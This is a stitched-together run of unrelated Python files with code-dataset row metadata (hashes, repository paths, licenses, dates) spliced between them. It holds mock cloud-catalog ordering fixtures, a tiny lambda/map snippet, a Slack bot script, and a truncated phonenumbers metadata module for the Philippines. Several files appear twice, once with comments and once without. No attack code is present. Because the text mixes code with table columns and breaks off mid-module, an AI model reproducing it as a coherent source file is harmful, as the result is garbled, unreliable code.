     'keyName': 'OS_UBUNTU_14_04_LTS_TRUSTY_TAHR_64_BIT',
     'prices': [{'accountRestrictions': [],
                 'currentPriceFlag': '',
                 'hourlyRecurringFee': '0.10',
                 'id': 37650,
                 "locationGroupId": '',
                 'itemId': 4702,
                 'laborFee': '0',
                 'onSaleFlag': '',
                 'oneTimeFee': '0',
                 'quantity': '',
                 'recurringFee': '0.1',
                 'setupFee': '0.1',
                 'sort': 9}],
     'softwareDescription': {'id': 1362,
                             'longDescription': 'Ubuntu / 14.04-64',
                             'referenceCode': 'UBUNTU_14_64'}}
]
# Fixture: three price records for the same 1 GB iSCSI SAN Storage item
# (item id 1111) at different recurring fees ('.35', '0', '15'), each with a
# packageReferences entry linking price to package.
getItemPricesISCSI = [
    {
        'currentPriceFlag': '',
        'id': 2152,
        'item': {
            'capacity': '1',
            'description': '1 GB iSCSI SAN Storage',
            'id': 1111,
            'softwareDescriptionId': '',
            'units': 'GB',
            'upgradeItemId': 547},
        'itemId': 1111,
        'laborFee': '0',
        'onSaleFlag': '',
        'oneTimeFee': '0',
        'packageReferences': [{'id': 46626,
                               'itemPriceId': 2152, 'packageId': 0}],
        'quantity': '',
        'recurringFee': '.35',
        'setupFee': '0',
        'sort': 0
    },
    {
        'currentPriceFlag': '',
        'id': 22501,
        'item': {'capacity': '1',
                 'description': '1 GB iSCSI SAN Storage',
                 'id': 1111,
                 'softwareDescriptionId': '',
                 'units': 'GB',
                 'upgradeItemId': 547},
        'itemId': 1111,
        'laborFee': '0',
        'onSaleFlag': '',
        'oneTimeFee': '0',
        'packageReferences': [{
            'id': 252983,
            'itemPriceId': 22501, 'packageId': 0
        }],
        'quantity': '',
        'recurringFee': '0',
        'setupFee': '0',
        'sort': 0
    },
    {
        'currentPriceFlag': '',
        'id': 22441,
        'item': {
            'capacity': '1',
            'description': '1 GB iSCSI SAN Storage',
            'id': 1111,
            'softwareDescriptionId': '',
            'units': 'GB',
            'upgradeItemId': 547
        },
        'itemId': 1111,
        'laborFee': '0',
        'onSaleFlag': '',
        'oneTimeFee': '0',
        'packageReferences': [{'id': 250326,
                               'itemPriceId': 22441, 'packageId': 0}],
        'quantity': '',
        'recurringFee': '15',
        'setupFee': '0',
        'sort': 0
    }]
# Fixture: reduced getItems()-style list (port speed x2, RAM) used for
# virtual-server scenarios; all prices carry zero fees, unlike the
# otherwise-identical leading entries of getItems.
getItemsVS = [
    {
        'id': 1234,
        'keyName': 'KeyName01',
        'capacity': '1000',
        'description': 'Public & Private Networks',
        'itemCategory': {'categoryCode': 'Uplink Port Speeds'},
        'softwareDescription': {
            'id': 1228,
            'longDescription': 'Redhat EL 5.10-64',
            'referenceCode': 'REDHAT_5_64'
        },
        'prices': [{'id': 1122,
                    'hourlyRecurringFee': 0.0,
                    'recurringFee': 0.0,
                    'categories': [{'id': 26,
                                    'name': 'Uplink Port Speeds',
                                    'categoryCode': 'port_speed'}]}],
    },
    {
        'id': 2233,
        'keyName': 'KeyName02',
        'capacity': '1000',
        'description': 'Public & Private Networks',
        'itemCategory': {'categoryCode': 'Uplink Port Speeds'},
        'prices': [{'id': 4477,
                    'hourlyRecurringFee': 0.0,
                    'recurringFee': 0.0,
                    'categories': [{'id': 26,
                                    'name': 'Uplink Port Speeds',
                                    'categoryCode': 'port_speed'}]}],
    },
    {
        'id': 1239,
        'keyName': 'KeyName03',
        'capacity': '2',
        'description': 'RAM',
        'itemCategory': {'categoryCode': 'RAM'},
        'prices': [{'id': 1133,
                    'hourlyRecurringFee': 0.0,
                    'recurringFee': 0.0,
                    'categories': [{'id': 3,
                                    'name': 'RAM',
                                    'categoryCode': 'ram'}]}],
    }
]
# Fixture: verifyOrder()-style container for a dedicated-host order —
# one hardware stub, one hourly 56-core price with its RAM/disk bundle,
# and the order-level totals/flags (hourly pricing, dal05 location).
verifyOrderDH = {
    'preTaxSetup': '0',
    'storageGroups': [],
    'postTaxRecurring': '3.164',
    'billingOrderItemId': '',
    'presetId': '',
    'hardware': [
        {
            'domain': 't.com',
            'hostname': 't',
            'bareMetalInstanceFlag': '',
            'hardwareStatusId': '',
            'primaryBackendNetworkComponent': {
                'router': {
                    'id': 51218
                },
                'networkVlanId': ''
            },
            'accountId': ''
        }
    ],
    'prices': [
        {
            'itemId': 10195,
            'setupFee': '0',
            'recurringFee': '0',
            'hourlyRecurringFee': '3.164',
            'oneTimeFee': '0',
            'id': 200269,
            'item': {
                'thirdPartyPolicyAssignments': [],
                'capacity': '56',
                'description': '56 Cores X 242 RAM X 1.2 TB',
                'bundle': [
                    {
                        'category': {
                            'categoryCode': 'dedicated_host_ram',
                            'id': 850,
                            'name': 'Dedicated Host RAM'
                        },
                        'itemPriceId': 200301,
                        'itemPrice': {
                            'itemId': 10199,
                            'setupFee': '0',
                            'recurringFee': '0',
                            'hourlyRecurringFee': '0',
                            'oneTimeFee': '0',
                            'id': 200301,
                            'laborFee': '0'
                        },
                        'bundleItemId': 10195,
                        'bundleItem': {
                            'units': 'CORE',
                            'keyName': '56_CORES_X_242_RAM_X_1_4_TB',
                            'capacity': '56',
                            'description': '56 Cores X 242 RAM X 1.2 TB',
                            'id': 10195
                        },
                        'id': 41763
                    },
                    {
                        'category': {
                            'categoryCode': 'dedicated_host_disk',
                            'id': 851,
                            'name': 'Dedicated Host Disk'
                        },
                        'itemPriceId': 200299,
                        'itemPrice': {
                            'itemId': 10197,
                            'setupFee': '0',
                            'recurringFee': '0',
                            'hourlyRecurringFee': '0',
                            'oneTimeFee': '0',
                            'id': 200299,
                            'laborFee': '0'
                        },
                        'bundleItemId': 10195,
                        'bundleItem': {
                            'units': 'CORE',
                            'keyName': '56_CORES_X_242_RAM_X_1_4_TB',
                            'capacity': '56',
                            'description': '56 Cores X 242 RAM X 1.2 TB',
                            'id': 10195
                        },
                        'id': 41761
                    }
                ],
                'keyName': '56_CORES_X_242_RAM_X_1_4_TB',
                'units': 'CORE',
                'id': 10195
            },
            'laborFee': '0',
            'categories': [
                {
                    'categoryCode': 'dedicated_virtual_hosts',
                    'id': 848,
                    'name': 'Dedicated Host'
                }
            ]
        }
    ],
    'sendQuoteEmailFlag': '',
    'packageId': 813,
    'useHourlyPricing': True,
    'preTaxRecurringMonthly': '0',
    'message': '',
    'preTaxRecurring': '3.164',
    'primaryDiskPartitionId': '',
    'locationObject': {
        'id': 138124,
        'name': 'dal05',
        'longName': 'Dallas 5'
    },
    'taxCompletedFlag': False,
    'isManagedOrder': '',
    'imageTemplateId': '',
    'postTaxRecurringMonthly': '0',
    'resourceGroupTemplateId': '',
    'postTaxSetup': '0',
    'sshKeys': [],
    'location': '138124',
    'stepId': '',
    'proratedInitialCharge': '0',
    'totalRecurringTax': '0',
    'paymentType': '',
    'resourceGroupId': '',
    'sourceVirtualGuestId': '',
    'bigDataOrderFlag': False,
    'extendedHardwareTesting': '',
    'preTaxRecurringHourly': '3.164',
    'postTaxRecurringHourly': '3.164',
    'currencyShortName': 'USD',
    'containerSplHash': '000000003699c54000007f38ef8b0102',
    'proratedOrderTotal': '0',
    'serverCoreCount': '',
    'privateCloudOrderFlag': False,
    'totalSetupTax': '0',
    'quantity': 1
}
# Fixture: two load-balancer-as-a-service items — the service itself with a
# standard (locationGroupId '') zero price, and an uptime item priced only
# for location group 507.
itemsLoadbal = [
    {
        "capacity": "0",
        "description": "Load Balancer as a Service",
        "id": 10043,
        "keyName": "LOAD_BALANCER_AS_A_SERVICE",
        "itemCategory": {
            "categoryCode": "load_balancer_as_a_service",
            "id": 1116,
            "name": "Load Balancer As A Service",
        },
        "prices": [
            {
                "hourlyRecurringFee": "0",
                "id": 199447,
                "locationGroupId": '',
                "recurringFee": "0",
            }
        ]
    },
    {
        "capacity": "0",
        "description": "Load Balancer Uptime",
        "id": 10785,
        "keyName": "LOAD_BALANCER_UPTIME",
        "itemCategory": {
            "categoryCode": "load_balancer_uptime",
            "id": 1119,
            "name": "Load Balancer Uptime",
        },
        "prices": [
            {
                "hourlyRecurringFee": ".028",
                "id": 205913,
                "locationGroupId": 507,
            }]}
]
# Fixture: the WDC01 region with its location's pricing groups — includes
# group id 507, which matches itemsLoadbal's group-specific uptime price.
regionsLoadbal = [{'description': 'WDC01 - Washington, DC - East Coast U.S.',
                   'keyname': 'WASHINGTON_DC',
                   'location': {'location': {'id': 37473,
                                             'longName': 'Washington 1',
                                             'name': 'wdc01',
                                             "groups": [
                                                 {
                                                     "description": "Location Group 4",
                                                     "id": 507,
                                                     "locationGroupTypeId": 82,
                                                     "name": "Location Group 4",
                                                     "locationGroupType": {
                                                         "name": "PRICING"
                                                     }
                                                 },
                                                 {
                                                     "description": "COS Cross Region - EU",
                                                     "id": 1303,
                                                     "locationGroupTypeId": 82,
                                                     "name": "eu",
                                                     "locationGroupType": {
                                                         "name": "PRICING"
                                                     }
                                                 },
                                                 {
                                                     "description": "COS Regional Frankfurt",
                                                     "id": 1783,
                                                     "locationGroupTypeId": 82,
                                                     "name": "eu-de",
                                                     "locationGroupType": {
                                                         "name": "PRICING"
                                                     }
                                                 }
                                             ]
                                             }},
                   'sortOrder': 10}]
# Fixture: getAllObjects()-style response for the LBaaS package (id 805),
# composed from the itemsLoadbal and regionsLoadbal fixtures above.
getAllObjectsLoadbal = [
    dict(
        id=805,
        keyName="LBAAS",
        name="Load Balancer As A Service (LBaaS)",
        items=itemsLoadbal,
        regions=regionsLoadbal,
    )
]
# Fixture: getAllObjects()-style response for the Dedicated Host package
# (id 813) — one 56-core item with RAM/disk bundle items and two prices
# (standard '' and location group 503), plus the DAL05 region with its
# pricing group details.
getAllObjectsDH = [{
    "subDescription": "Dedicated Host",
    "name": "Dedicated Host",
    "items": [{
        "capacity": "56",
        "description": "56 Cores X 242 RAM X 1.2 TB",
        "bundleItems": [
            {
                "capacity": "1200",
                "keyName": "1_4_TB_LOCAL_STORAGE_DEDICATED_HOST_CAPACITY",
                "categories": [{
                    "categoryCode": "dedicated_host_disk"
                }]
            },
            {
                "capacity": "242",
                "keyName": "242_GB_RAM",
                "categories": [{
                    "categoryCode": "dedicated_host_ram"
                }]
            }
        ],
        "prices": [
            {
                "itemId": 10195,
                "setupFee": "0",
                "recurringFee": "2099",
                "tierMinimumThreshold": "",
                "hourlyRecurringFee": "3.164",
                "oneTimeFee": "0",
                "currentPriceFlag": "",
                "id": 200269,
                "sort": 0,
                "onSaleFlag": "",
                "laborFee": "0",
                "locationGroupId": "",
                "quantity": ""
            },
            {
                "itemId": 10195,
                "setupFee": "0",
                "recurringFee": "2161.97",
                "tierMinimumThreshold": "",
                "hourlyRecurringFee": "3.258",
                "oneTimeFee": "0",
                "currentPriceFlag": "",
                "id": 200271,
                "sort": 0,
                "onSaleFlag": "",
                "laborFee": "0",
                "locationGroupId": 503,
                "quantity": ""
            }
        ],
        "keyName": "56_CORES_X_242_RAM_X_1_4_TB",
        "id": 10195,
        "itemCategory": {
            "categoryCode": "dedicated_virtual_hosts"
        }
    }],
    "keyName": "DEDICATED_HOST",
    "unitSize": "",
    "regions": [{
        "location": {
            "locationPackageDetails": [{
                "isAvailable": 1,
                "locationId": 138124,
                "packageId": 813
            }],
            "location": {
                "statusId": 2,
                "priceGroups": [{
                    "locationGroupTypeId": 82,
                    "description": "CDN - North America - Akamai",
                    "locationGroupType": {
                        "name": "PRICING"
                    },
                    "securityLevelId": "",
                    "id": 1463,
                    "name": "NORTH-AMERICA-AKAMAI"
                }],
                "id": 138124,
                "name": "dal05",
                "longName": "Dallas 5"
            }
        },
        "keyname": "DALLAS05",
        "description": "DAL05 - Dallas",
        "sortOrder": 12
    }],
    "firstOrderStepId": "",
    "id": 813,
    "isActive": 1,
    "description": "Dedicated Host"
}]
getAllObjectsDHGpu = [{
"subDescription": "Dedicated Host",
"name": "Dedicated Host",
"items": [{
"capacity": "56",
"description": "56 Cores x 360 RAM x 1.2 TB x 2 GPU P100 [encryption enabled]",
"bundleItems": [
{
"capacity": "1200",
"keyName": "1.2 TB Local Storage (Dedicated Host Capacity)",
"categories": [{
"categoryCode": "dedicated_host_disk"
}]
},
{
"capacity": "242",
"keyName": "2_GPU_P100_DEDICATED",
"hardwareGenericComponentModel": {
"capacity": "16",
"id": 849,
"hardwareComponentType": {
"id": 20,
"keyName": "GPU"
}
},
"categories": [{
"categoryCode": "dedicated_host_ram"
}]
}
],
"prices": [
{
"itemId": 10195,
"setupFee": "0",
"recurringFee": "2099",
"tierMinimumThreshold": "",
"hourlyRecurringFee": "3.164",
"oneTimeFee": "0",
"currentPriceFlag": "",
"id": 200269,
"sort": 0,
"onSaleFlag": "",
"laborFee": "0",
"locationGroupId": "",
"quantity": ""
},
{
"itemId": 10195,
"setupFee": "0",
"recurringFee": "2161.97",
"tierMinimumThreshold": "",
"hourlyRecurringFee": "3.258",
"oneTimeFee": "0",
"currentPriceFlag": "",
"id": 200271,
"sort": 0,
"onSaleFlag": "",
"laborFee": "0",
"locationGroupId": 503,
"quantity": ""
}
],
"keyName": "56_CORES_X_484_RAM_X_1_5_TB_X_2_GPU_P100",
"id": 10195,
"itemCategory": {
"categoryCode": "dedicated_virtual_hosts"
}
}],
"keyName": "DEDICATED_HOST",
"unitSize": "",
"regions": [{
"location": {
"locationPackageDetails": [{
"isAvailable": 1,
"locationId": 138124,
"packageId": 813
}],
"location": {
"statusId": 2,
"priceGroups": [{
"locationGroupTypeId": 82,
"description": "CDN - North America - Akamai",
"locationGroupType": {
"name": "PRICING"
},
"securityLevelId": "",
"id": 1463,
"name": "NORTH-AMERICA-AKAMAI"
}],
"id": 138124,
"name": "dal05",
"longName": "Dallas 5"
}
},
"keyname": "DALLAS05",
"description": "DAL05 - Dallas",
"sortOrder": 12
}],
"firstOrderStepId": "",
"id": 813,
"isActive": 1,
"description": "Dedicated Host"
}]
getRegions = [{
"description": "WDC07 - Washington, DC",
"keyname": "WASHINGTON07",
"location": {
"locationId": 2017603,
"location": {
"id": 2017603,
"longName": "Washington 7",
"name": "wdc07",
"priceGroups": [
{
"description": "COS Regional - US East",
"id": 1305,
"locationGroupTypeId": 82,
"name": "us-east",
"locationGroupType": {
"name": "PRICING"
}
}
]
}
},
"locations": [{
"location": {
"euCompliantFlag": False,
"id": 2017603,
"longName": "Washington 7",
"name": "wdc07",
"statusId": 2},
"locationPackageDetails": [{
"isAvailable": 1,
"locationId": 2017603,
"packageId": 46
}]
}]
}]
getItemPrices = [
{
"hourlyRecurringFee": ".093",
"id": 204015,
"recurringFee": "62",
"categories": [
{
"categoryCode": "guest_core"
}
],
"item": {
"description": "4 x 2.0 GHz or higher Cores",
"id": 859,
"keyName": "GUEST_CORES_4",
},
"pricingLocationGroup": {
"id": 503,
"locations": [
{
"id": 449610,
"longName": "Montreal 1",
"name": "mon01",
"statusId": 2,
"regions": [
{
"description": "MON01 - Montreal",
"keyname": "MONTREAL",
"sortOrder": 94
}
]
},
{
"id": 449618,
"longName": "Montreal 2",
"name": "mon02",
"statusId": 2
},
{
"id": 448994,
"longName": "Toronto 1",
"name": "tor01",
"statusId": 2
},
{
"id": 350993,
"longName": "Toronto 2",
"name": "tor02",
"statusId": 2
},
{
"id": 221894,
"longName": "Amsterdam 2",
"name": "ams02",
"statusId": 2,
"regions": [
{
"description": "AMS02 POP - Amsterdam",
"keyname": "AMSTERDAM02",
"sortOrder": 12
}
]
},
{
"id": 265592,
"longName": "Amsterdam 1",
"name": "ams01",
"statusId": 2
},
{
"id": 814994,
"longName": "Amsterdam 3",
"name": "ams03",
"statusId": 2
}
]
}
},
{
"hourlyRecurringFee": ".006",
"id": 204663,
"recurringFee": "4.1",
"item": {
"description": "100 GB (LOCAL)",
"id": 3899,
"keyName": "GUEST_DISK_100_GB_LOCAL_3",
},
"pricingLocationGroup": {
"id": 503,
"locations": [
{
"id": 449610,
"longName": "Montreal 1",
"name": "mon01",
"statusId": 2
},
{
"id": 449618,
"longName": "Montreal 2",
"name": "mon02",
"statusId": 2
},
{
"id": 448994,
"longName": "Toronto 1",
"name": "tor01",
"statusId": 2
},
{
"id": 350993,
"longName": "Toronto 2",
"name": "tor02",
"statusId": 2
},
{
"id": 221894,
"longName": "Amsterdam 2",
"name": "ams02",
"statusId": 2
},
{
"id": 265592,
"longName": "Amsterdam 1",
"name": "ams01",
"statusId": 2
},
{
"id": 814994,
"longName": "Amsterdam 3",
"name": "ams03",
"statusId": 2
}
]
}
},
{
"hourlyRecurringFee": ".217",
"id": 204255,
"recurringFee": "144",
"item": {
"description": "16 GB ",
"id": 1017,
"keyName": "RAM_16_GB",
},
"pricingLocationGroup": {
"id": 503,
"locations": [
{
"id": 449610,
"longName": "Montreal 1",
"name": "mon01",
"statusId": 2
},
{
"id": 449618,
"longName": "Montreal 2",
"name": "mon02",
"statusId": 2
},
{
"id": 448994,
"longName": "Toronto 1",
"name": "tor01",
"statusId": 2
},
{
"id": 350993,
"longName": "Toronto 2",
"name": "tor02",
"statusId": 2
},
{
"id": 221894,
"longName": "Amsterdam 2",
"name": "ams02",
"statusId": 2
},
{
"id": 265592,
"longName": "Amsterdam 1",
"name": "ams01",
"statusId": 2
},
{
"id": 814994,
"longName": "Amsterdam 3",
"name": "ams03",
"statusId": 2
}
]
}
}
]
getActivePresets = [
{
"description": "M1.64x512x25",
"id": 799,
"isActive": "1",
"keyName": "M1_64X512X25",
"name": "M1.64x512x25",
"packageId": 835
},
{
"description": "M1.56x448x100",
"id": 797,
"isActive": "1",
"keyName": "M1_56X448X100",
"name": "M1.56x448x100",
"packageId": 835
},
{
"description": "M1.64x512x100",
"id": 801,
"isActive": "1",
"keyName": "M1_64X512X100",
"name": "M1.64x512x100",
"packageId": 835
}
]
getAccountRestrictedActivePresets = []
RESERVED_CAPACITY = [{"id": 1059}]
getItems_RESERVED_CAPACITY = [
{
'id': 12273,
'keyName': 'B1_1X2_1_YEAR_TERM',
'description': 'B1 1x2 1 year term',
'capacity': 12,
'itemCategory': {
'categoryCode': 'reserved_capacity',
'id': 2060,
'name': 'Reserved Capacity',
'quantityLimit': 20,
'sortOrder': ''
},
'prices': [
{
'currentPriceFlag': '',
'hourlyRecurringFee': '.032',
'id': 217561,
'itemId': 12273,
'laborFee': '0',
'locationGroupId': '',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'setupFee': '0',
'sort': 0,
'tierMinimumThreshold': '',
'categories': [
{
'categoryCode': 'reserved_capacity',
'id': 2060,
'name': 'Reserved Capacity',
'quantityLimit': 20,
'sortOrder': ''
}
]
}
]
}
]
getItems_1_IPV6_ADDRESS = [
{
'id': 4097,
'keyName': '1_IPV6_ADDRESS',
'itemCategory': {
'categoryCode': 'pri_ipv6_addresses',
'id': 325,
'name': 'Primary IPv6 Addresses',
'quantityLimit': 0,
'sortOrder': 34
},
'prices': [
{
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 17129,
'itemId': 4097,
'laborFee': '0',
'locationGroupId': '',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0,
'tierMinimumThreshold': '',
'categories': [
{
'categoryCode': 'pri_ipv6_addresses',
'id': 325,
'name': 'Primary IPv6 Addresses',
'quantityLimit': 0,
'sortOrder': 34
}
]
}
]
}
]
getObject = {
'id': 200,
'regions': [{'description': 'WDC01 - Washington, DC - East Coast U.S.',
'keyname': 'WASHINGTON_DC',
'location': {'location': {'id': 37473,
'longName': 'Washington 1',
'name': 'wdc01'}},
'sortOrder': 10}],
'accountRestrictedActivePresets': [],
'activePresets': [
{
'description': 'AC2.8x60x25',
'id': 861,
'isActive': '1',
'keyName': 'AC2_8X60X25',
'name': 'AC2.8x60x25',
'packageId': 835
},
{
'description': 'AC2.8x60x100',
'id': 863,
'isActive': '1',
'keyName': 'AC2_8X60X100',
'name': 'AC2.8x60x100',
'packageId': 835
}],
"items": [{
"capacity": "56",
"description": "56 Cores x 360 RAM x 1.2 TB x 2 GPU P100 [encryption enabled]",
"bundleItems": [
{
"capacity": "1200",
"keyName": "1.2 TB Local Storage (Dedicated Host Capacity)",
"categories": [{
"categoryCode": "dedicated_host_disk"
}]
},
{
"capacity": "242",
"keyName": "2_GPU_P100_DEDICATED",
"hardwareGenericComponentModel": {
"capacity": "16",
"id": 849,
"hardwareComponentType": {
"id": 20,
"keyName": "GPU"
}
},
"categories": [{
"categoryCode": "dedicated_host_ram"
}, {
"capacity": "2",
"description": "2 x 2.0 GHz or higher Cores",
"keyName": "GUEST_CORES_2",
"attributes": [
{
"id": 8261,
"attributeTypeKeyName": "ORDER_SAVES_USAGE_FEES"
}
],
"itemCategory": {
"categoryCode": "guest_core",
"id": 80
}}]
}
],
"prices": [
{
"itemId": 10195,
"setupFee": "0",
"recurringFee": "2099",
"tierMinimumThreshold": "",
"hourlyRecurringFee": "3.164",
"oneTimeFee": "0",
"currentPriceFlag": "",
"id": 200269,
"sort": 0,
"onSaleFlag": "",
"laborFee": "0",
"locationGroupId": "",
"quantity": ""
},
{
"itemId": 10195,
"setupFee": "0",
"recurringFee": "2161.97",
"tierMinimumThreshold": "",
"hourlyRecurringFee": "3.258",
"oneTimeFee": "0",
"currentPriceFlag": "",
"id": 200271,
"sort": 0,
"onSaleFlag": "",
"laborFee": "0",
"locationGroupId": 503,
"quantity": ""
}
],
"keyName": "56_CORES_X_484_RAM_X_1_5_TB_X_2_GPU_P100",
"id": 10195,
"itemCategory": {
"categoryCode": "dedicated_virtual_hosts"
}
}]}
| true
| true
|
f705b13cfc1cd5bcb7ec174f96d2acb2a724ac65
| 41
|
py
|
Python
|
lectures/code/mr_map.py
|
naskoch/python_course
|
84adfd3f8d48ca3ad5837f7acc59d2fa051e95d3
|
[
"MIT"
] | 4
|
2015-08-10T17:46:55.000Z
|
2020-04-18T21:09:03.000Z
|
lectures/code/mr_map.py
|
naskoch/python_course
|
84adfd3f8d48ca3ad5837f7acc59d2fa051e95d3
|
[
"MIT"
] | null | null | null |
lectures/code/mr_map.py
|
naskoch/python_course
|
84adfd3f8d48ca3ad5837f7acc59d2fa051e95d3
|
[
"MIT"
] | 2
|
2019-04-24T03:31:02.000Z
|
2019-05-13T07:36:06.000Z
|
f = lambda x: x + 1
map(f, [1, 2, 3, 4])
| 13.666667
| 20
| 0.439024
|
f = lambda x: x + 1
map(f, [1, 2, 3, 4])
| true
| true
|
f705b2b334785f83ba36f8f36add6d246c62f860
| 2,257
|
py
|
Python
|
slackbot_te/slackpi.py
|
wray/slack_em
|
ac4bc3c0a5c6c644582d9117a1111d1bfad3bf66
|
[
"MIT"
] | null | null | null |
slackbot_te/slackpi.py
|
wray/slack_em
|
ac4bc3c0a5c6c644582d9117a1111d1bfad3bf66
|
[
"MIT"
] | null | null | null |
slackbot_te/slackpi.py
|
wray/slack_em
|
ac4bc3c0a5c6c644582d9117a1111d1bfad3bf66
|
[
"MIT"
] | null | null | null |
import os
import time
from slackclient import SlackClient
import bot_id
# Instructor and student imports
import wray.slacklib
import joe.slacklib
import chris.slacklib
# constants
try:
AT_BOT = "<@" + bot_id.get_id() + ">"
except TypeError:
pass
# instantiate client
slack_client = SlackClient(os.environ.get('SLACK_BOT_TOKEN'))
def handle_command(command, channel):
"""
Receives commands directed at the bot and determines if they
are valid commands. If so, then acts on the commands. If not,
returns back what it needs for clarification.
Need to determine an algorithm for student overloaded commands.
"""
response = wray.slacklib.handle_command(command)
response += joe.slacklib.handle_command(command)
response += chris.slacklib.handle_command(command)
print("["+response+"]")
if len(response) == 0:
response = "Why thank you, I don't know what else to say."
slack_client.api_call("chat.postMessage", channel=channel,
text=response, as_user=True)
def parse_slack_output(slack_rtm_output):
"""
The Slack Real Time Messaging API is an events firehose.
this parsing function returns None unless a message is
directed at the Bot, based on its ID.
"""
output_list = slack_rtm_output
print(output_list)
if output_list and len(output_list) > 0:
for output in output_list:
if output and 'text' in output and AT_BOT in output['text']:
# return text after the @ mention, whitespace removed
return output['text'].split(AT_BOT)[1].strip().lower(), \
output['channel']
return None, None
if __name__ == "__main__":
READ_WEBSOCKET_DELAY = 1 # 1 second delay between reading from firehose
if slack_client.rtm_connect():
print("StarterBot connected and running!")
while True:
command, channel = parse_slack_output(slack_client.rtm_read())
print(command,channel)
if command and channel:
handle_command(command, channel)
time.sleep(READ_WEBSOCKET_DELAY)
else:
print("Connection failed. Invalid Slack token or bot ID?")
| 30.5
| 75
| 0.658839
|
import os
import time
from slackclient import SlackClient
import bot_id
import wray.slacklib
import joe.slacklib
import chris.slacklib
try:
AT_BOT = "<@" + bot_id.get_id() + ">"
except TypeError:
pass
slack_client = SlackClient(os.environ.get('SLACK_BOT_TOKEN'))
def handle_command(command, channel):
response = wray.slacklib.handle_command(command)
response += joe.slacklib.handle_command(command)
response += chris.slacklib.handle_command(command)
print("["+response+"]")
if len(response) == 0:
response = "Why thank you, I don't know what else to say."
slack_client.api_call("chat.postMessage", channel=channel,
text=response, as_user=True)
def parse_slack_output(slack_rtm_output):
output_list = slack_rtm_output
print(output_list)
if output_list and len(output_list) > 0:
for output in output_list:
if output and 'text' in output and AT_BOT in output['text']:
# return text after the @ mention, whitespace removed
return output['text'].split(AT_BOT)[1].strip().lower(), \
output['channel']
return None, None
if __name__ == "__main__":
READ_WEBSOCKET_DELAY = 1 # 1 second delay between reading from firehose
if slack_client.rtm_connect():
print("StarterBot connected and running!")
while True:
command, channel = parse_slack_output(slack_client.rtm_read())
print(command,channel)
if command and channel:
handle_command(command, channel)
time.sleep(READ_WEBSOCKET_DELAY)
else:
print("Connection failed. Invalid Slack token or bot ID?")
| true
| true
|
f705b48143f78825bb5ce93336c2b928cbc14651
| 2,601
|
py
|
Python
|
venv/Lib/site-packages/phonenumbers/data/region_PH.py
|
HarisHijazi/mojarnik-server
|
bee7266609cc0bca7cc6a4059086fc0ba7219a33
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/phonenumbers/data/region_PH.py
|
HarisHijazi/mojarnik-server
|
bee7266609cc0bca7cc6a4059086fc0ba7219a33
|
[
"MIT"
] | 2
|
2021-06-22T01:34:18.000Z
|
2021-06-22T01:40:28.000Z
|
venv/Lib/site-packages/phonenumbers/data/region_PH.py
|
HarisHijazi/mojarnik-server
|
bee7266609cc0bca7cc6a4059086fc0ba7219a33
|
[
"MIT"
] | null | null | null |
"""Auto-generated file, do not edit by hand. PH metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_PH = PhoneMetadata(id='PH', country_code=63, international_prefix='00',
general_desc=PhoneNumberDesc(national_number_pattern='1800\\d{7,9}|(?:2|[89]\\d{4})\\d{5}|[2-8]\\d{8}|[28]\\d{7}', possible_length=(6, 8, 9, 10, 11, 12, 13), possible_length_local_only=(4, 5, 7)),
fixed_line=PhoneNumberDesc(national_number_pattern='(?:(?:2[3-8]|3[2-68]|4[2-9]|5[2-6]|6[2-58]|7[24578])\\d{3}|88(?:22\\d\\d|42))\\d{4}|2\\d{5}(?:\\d{2})?|8[2-8]\\d{7}', example_number='21234567', possible_length=(6, 8, 9, 10), possible_length_local_only=(4, 5, 7)),
mobile=PhoneNumberDesc(national_number_pattern='(?:8(?:1[37]|9[5-8])|9(?:0[5-9]|1[0-24-9]|[2357]\\d|4[2-9]|6[0-35-9]|8[189]|9[1-9]))\\d{7}', example_number='9051234567', possible_length=(10,)),
toll_free=PhoneNumberDesc(national_number_pattern='1800\\d{7,9}', example_number='180012345678', possible_length=(11, 12, 13)),
national_prefix='0',
national_prefix_for_parsing='0',
number_format=[NumberFormat(pattern='(\\d)(\\d{5})', format='\\1 \\2', leading_digits_pattern=['2'], national_prefix_formatting_rule='(0\\1)'),
NumberFormat(pattern='(\\d)(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['2'], national_prefix_formatting_rule='(0\\1)'),
NumberFormat(pattern='(\\d{4})(\\d{4,6})', format='\\1 \\2', leading_digits_pattern=['3(?:23|39|46)|4(?:2[3-6]|[35]9|4[26]|76)|544|88[245]|(?:52|64|86)2', '3(?:230|397|461)|4(?:2(?:35|[46]4|51)|396|4(?:22|63)|59[347]|76[15])|5(?:221|446)|642[23]|8(?:622|8(?:[24]2|5[13]))'], national_prefix_formatting_rule='(0\\1)'),
NumberFormat(pattern='(\\d{5})(\\d{4})', format='\\1 \\2', leading_digits_pattern=['346|4(?:27|9[35])|883', '3469|4(?:279|9(?:30|56))|8834'], national_prefix_formatting_rule='(0\\1)'),
NumberFormat(pattern='(\\d)(\\d{4})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['2'], national_prefix_formatting_rule='(0\\1)'),
NumberFormat(pattern='(\\d{2})(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['[3-7]|8[2-8]'], national_prefix_formatting_rule='(0\\1)'),
NumberFormat(pattern='(\\d{3})(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['[89]'], national_prefix_formatting_rule='0\\1'),
NumberFormat(pattern='(\\d{4})(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['1']),
NumberFormat(pattern='(\\d{4})(\\d{1,2})(\\d{3})(\\d{4})', format='\\1 \\2 \\3 \\4', leading_digits_pattern=['1'])])
| 130.05
| 325
| 0.618608
|
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_PH = PhoneMetadata(id='PH', country_code=63, international_prefix='00',
general_desc=PhoneNumberDesc(national_number_pattern='1800\\d{7,9}|(?:2|[89]\\d{4})\\d{5}|[2-8]\\d{8}|[28]\\d{7}', possible_length=(6, 8, 9, 10, 11, 12, 13), possible_length_local_only=(4, 5, 7)),
